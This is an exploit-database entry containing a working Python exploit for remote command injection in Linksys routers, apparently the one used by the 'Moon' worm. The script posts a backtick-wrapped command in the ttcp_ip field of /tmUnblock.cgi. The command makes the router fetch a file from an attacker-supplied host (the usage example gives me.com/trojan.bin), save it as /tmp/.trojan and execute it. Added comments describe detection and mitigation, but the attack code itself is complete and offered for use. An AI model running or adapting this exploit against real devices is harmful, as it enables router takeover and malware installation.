Linksys Worm Remote Root



EKU-ID: 3822 CVE: OSVDB-ID:
Author: infodox Published: 2014-02-19 Verified: Verified


#!/usr/bin/python2
"""
Linksys Remote Root Exploit
infodox - insecurety research
This is the exploit this "Moon" worm uses.
Trivial blind cmd injection :)
This version is crippled - it only uses wget.
Twitter: @info_dox
Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
"""
import requests
import sys

def banner():
    # Prints the tool's ASCII-art banner to stdout. The text is wrapped in the
    # ANSI sequences \x1b[0;32m (green) and \x1b[0m (reset). This function
    # performs no network or file activity.
    print """\x1b[0;32m
.____    .__        __                          
|    |   |__| ____ |  | __  _________.__. ______
|    |   |  |/    \|  |/ / /  ___<   |  |/  ___/
|    |___|  |   |  \    <  \___ \ \___  |\___ \ 
|_______ \__|___|  /__|_ \/____  >/ ____/____  >
        \/       \/     \/     \/ \/         \/ 
       You are the weakest link. Goodbye.
Linksys remote root - infodox - Insecurety Research.
Version 2: Crippled (wget shelldrop only)
    \x1b[0m"""

def upShell(wget_url, target):
""" This works with the normal busybox wget at least, and worked in testing"""
    # Builds the command string handed to execute_command(): fetch wget_url to
    # /tmp/.trojan, chmod it 777, then run it. wget_url is interpolated with %s
    # as-is, with no quoting or validation. Returns None; the two print
    # statements are unconditional and do not reflect whether anything ran.
    #
    # Defender notes (indicators visible in this block):
    #   - on-device file path /tmp/.trojan, mode 777
    #   - an outbound HTTP fetch by wget originating from the router itself
    # Router-initiated downloads to hosts outside the vendor's update
    # infrastructure are worth alerting on at the network edge.
    cmd = "wget %s -O /tmp/.trojan;chmod 777 /tmp/.trojan;/tmp/.trojan" %(wget_url)
    print "{+} Planting Bomb!"
    execute_command(target=target, command=cmd)
    print "{!} TERRORISTS WIN!"

def execute_command(target, command):
    # Sends one HTTP POST to <target>/tmUnblock.cgi with `command` wrapped in
    # backticks inside the ttcp_ip form field. The response object is assigned
    # to mad_hax and never read, so the caller gets no output or success signal
    # (the "blind" injection named in the module docstring). Returns None.
    #
    # This code sends no credentials, cookies or session token.
    #
    # NOTE(review): the backtick wrapper implies the device hands ttcp_ip to a
    # shell without sanitising it. The firmware-side fix would presumably be to
    # validate the field strictly as an IP address and avoid the shell --
    # confirm against the vendor advisory.
    #
    # Detection: POST requests to /tmUnblock.cgi whose ttcp_ip value contains
    # backticks or other shell metacharacters. The fixed User-Agent below is a
    # weak indicator on its own, because it is a client-chosen header.
    # Mitigation: keep the router's web administration interface unreachable
    # from untrusted networks and run current vendor firmware.
    url = target + "/tmUnblock.cgi"
    injection = "-h `%s`" %(command)
    # this is a very sexy POST request. TOTALLY LEGIT.
    the_ownage = {'submit_button': '',
                  'change_action': '', 
                  'action': '', 
                  'commit': '0',
                  'ttcp_num': '2',
                  'ttcp_size': '2',
                  'ttcp_ip': injection,
                  'StartEPI': '1'}
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]'}
    # it is truly mad hax.
    mad_hax = requests.post(url=url, data=the_ownage, headers=headers)

def main(args):
    # Entry point: prints the banner, then requires exactly two command-line
    # arguments and passes them to upShell(). The `args` parameter is unused;
    # the function reads sys.argv directly. sys.argv[1] is used as the base URL
    # that /tmUnblock.cgi is appended to, and sys.argv[2] as the URL given to
    # wget. Neither value is validated. Exits with a usage message otherwise.
    banner()
    if len(sys.argv) != 3:
        sys.exit("usage: %s http://target http://me.com/trojan.bin" %(sys.argv[0]))
    upShell(wget_url=sys.argv[2], target=sys.argv[1])

# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main(sys.argv)